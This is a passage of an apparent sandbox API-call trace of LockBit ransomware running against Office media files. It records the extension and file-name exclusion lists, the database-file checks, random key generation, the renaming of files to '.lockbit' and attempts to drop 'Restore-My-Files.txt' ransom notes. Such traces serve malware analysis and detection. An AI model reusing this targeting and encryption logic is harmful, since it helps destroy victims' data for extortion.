(_Size=0xb2) returned 0x1fa2ed8 [0203.290] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.290] free (_Block=0x1fa2ed8) [0203.290] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14654_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.290] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.290] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.290] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4a53e00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb4a53e00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xad, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14655_.GIF", cAlternateFileName="")) returned 1 [0203.290] lstrcmpiW (lpString1=".", lpString2="BD14655_.GIF") returned -1 [0203.290] lstrcmpiW (lpString1="..", lpString2="BD14655_.GIF") returned -1 [0203.290] PathFindExtensionW (pszPath="BD14655_.GIF") returned=".GIF" [0203.290] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.290] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.290] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.291] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.291] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14655_.GIF") returned 1 [0203.291] lstrcmpiW (lpString1="ntldr", lpString2="BD14655_.GIF") returned 1 [0203.292] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14655_.GIF") returned 1 [0203.292] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14655_.GIF") returned 1 [0203.292] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14655_.GIF") returned -1 [0203.292] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14655_.GIF") returned 1 [0203.292] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14655_.GIF") returned 1 [0203.292] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.292] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF") returned=".GIF" [0203.292] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.292] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.292] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.293] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.293] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.293] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF.lockbit") returned 78 [0203.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14655_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.294] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.294] malloc (_Size=0x40068) returned 0x3df0008 [0203.294] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=173) returned 1 [0203.294] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.295] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.299] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.299] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.299] free (_Block=0x1fa2ed8) [0203.299] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14655_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.299] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.299] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.300] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5d66b00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb5d66b00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xad, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14656_.GIF", cAlternateFileName="")) returned 1 [0203.300] lstrcmpiW (lpString1=".", lpString2="BD14656_.GIF") returned -1 [0203.300] lstrcmpiW (lpString1="..", lpString2="BD14656_.GIF") returned -1 [0203.300] PathFindExtensionW (pszPath="BD14656_.GIF") returned=".GIF" [0203.300] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.300] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.300] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14656_.GIF") returned 1 [0203.301] lstrcmpiW (lpString1="ntldr", lpString2="BD14656_.GIF") returned 1 [0203.301] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14656_.GIF") returned 1 [0203.301] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14656_.GIF") returned 1 [0203.301] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14656_.GIF") returned -1 [0203.301] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14656_.GIF") returned 1 [0203.301] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14656_.GIF") returned 1 [0203.301] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.301] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF") returned=".GIF" [0203.301] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.301] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.301] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.302] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.302] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.302] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF.lockbit") returned 78 [0203.302] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14656_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.303] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.303] malloc (_Size=0x40068) returned 0x3df0008 [0203.303] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=173) returned 1 [0203.303] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.304] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.304] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.304] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.307] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.307] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.307] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.307] free (_Block=0x1fa2ed8) [0203.307] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14656_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.307] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.308] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4248700, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc4248700, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14691_.GIF", cAlternateFileName="")) returned 1 [0203.308] lstrcmpiW (lpString1=".", lpString2="BD14691_.GIF") returned -1 [0203.308] lstrcmpiW (lpString1="..", lpString2="BD14691_.GIF") returned -1 [0203.308] PathFindExtensionW (pszPath="BD14691_.GIF") returned=".GIF" [0203.308] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.308] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.308] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14691_.GIF") returned 1 [0203.309] lstrcmpiW (lpString1="ntldr", lpString2="BD14691_.GIF") returned 1 [0203.309] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14691_.GIF") returned 1 [0203.309] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14691_.GIF") returned 1 [0203.309] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14691_.GIF") returned -1 [0203.309] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14691_.GIF") returned 1 [0203.309] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14691_.GIF") returned 1 [0203.309] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.309] PathFindExtensionW (pszPath="C:\\\\Program 